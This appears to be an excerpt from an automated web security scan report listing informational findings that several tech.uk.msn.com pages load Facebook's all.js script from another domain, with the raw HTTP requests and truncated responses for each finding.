GET /media/articles.aspx?cp-documentid=154239335 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/hands-on-google-chromebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/hands-on-google-chromebook%2526oid%253Dhttp%25253A//tech.uk.msn.com/media/articles.aspx%25253Fcp-documentid%25253D154239335%2526ot%253DA; s_cc=true
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA31 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:04 GMT ntCoent-Length: 53322 Content-Length: 53322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.7. http://tech.uk.msn.com/microsoft/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; s_cc=true; s_sq=%5B%5BB%5D%5D; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA25 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:39:31 GMT ntCoent-Length: 62461 Content-Length: 62461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.8. http://tech.uk.msn.com/microsoft/bing/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/bing/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/bing/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:24 GMT ntCoent-Length: 60865 Content-Length: 60865 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.9. http://tech.uk.msn.com/microsoft/essentials/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/essentials/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/essentials/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA28 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:12 GMT ntCoent-Length: 62741 Content-Length: 62741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.10. http://tech.uk.msn.com/microsoft/hotmail/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/hotmail/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/hotmail/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA26 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:32 GMT ntCoent-Length: 61153 Content-Length: 61153 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.11. http://tech.uk.msn.com/microsoft/internet-explorer/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/internet-explorer/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/internet-explorer/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:18 GMT ntCoent-Length: 62171 Content-Length: 62171 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.12. http://tech.uk.msn.com/microsoft/messenger/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/messenger/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/messenger/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA27 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:26 GMT ntCoent-Length: 60864 Content-Length: 60864 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.13. http://tech.uk.msn.com/microsoft/office/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/office/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/office/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:08 GMT ntCoent-Length: 56346 Content-Length: 56346 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.14. http://tech.uk.msn.com/microsoft/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/photos.aspx
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/photos.aspx?cp-documentid=157623778 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/microsoft/photos.aspx?cp-documentid=157623778 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/microsoft/hotmail/%2526oid%253Dhttp%25253A//tech.uk.msn.com/microsoft/photos.aspx%25253Fcp-documentid%25253D157623778%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA28 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:59 GMT ntCoent-Length: 144189 Content-Length: 144189 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.15. http://tech.uk.msn.com/microsoft/windows-7/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/windows-7/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/windows-7/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:02 GMT ntCoent-Length: 56173 Content-Length: 56173 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.16. http://tech.uk.msn.com/microsoft/xbox/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/microsoft/xbox/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /microsoft/xbox/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA30 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:05 GMT ntCoent-Length: 59507 Content-Length: 59507 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.17. http://tech.uk.msn.com/news/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/news/
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /news/ HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/news/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; Sample=1; s_cc=true; s_sq=%5B%5BB%5D%5D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:47 GMT ntCoent-Length: 62276 Content-Length: 62276 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.18. http://tech.uk.msn.com/news/teenager-bailed-on-hacking-charges-2
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/news/teenager-bailed-on-hacking-charges-2
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /news/teenager-bailed-on-hacking-charges-2 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/news/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/news/%2526oid%253Dhttp%25253A//tech.uk.msn.com/news/articles.aspx%25253Fcp-documentid%25253D158731529%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA25 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:30 GMT ntCoent-Length: 90174 Content-Length: 90174 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]...
3.19. http://tech.uk.msn.com/phones/articles.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/phones/articles.aspx
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_GB/all.js
Request
GET /phones/articles.aspx?cp-documentid=158307155 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/phones/articles.aspx?cp-documentid=158307155 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/reviews/%2526oid%253Dhttp%25253A//tech.uk.msn.com/phones/articles.aspx%25253Fcp-documentid%25253D158307155%2526ot%253DA
Response
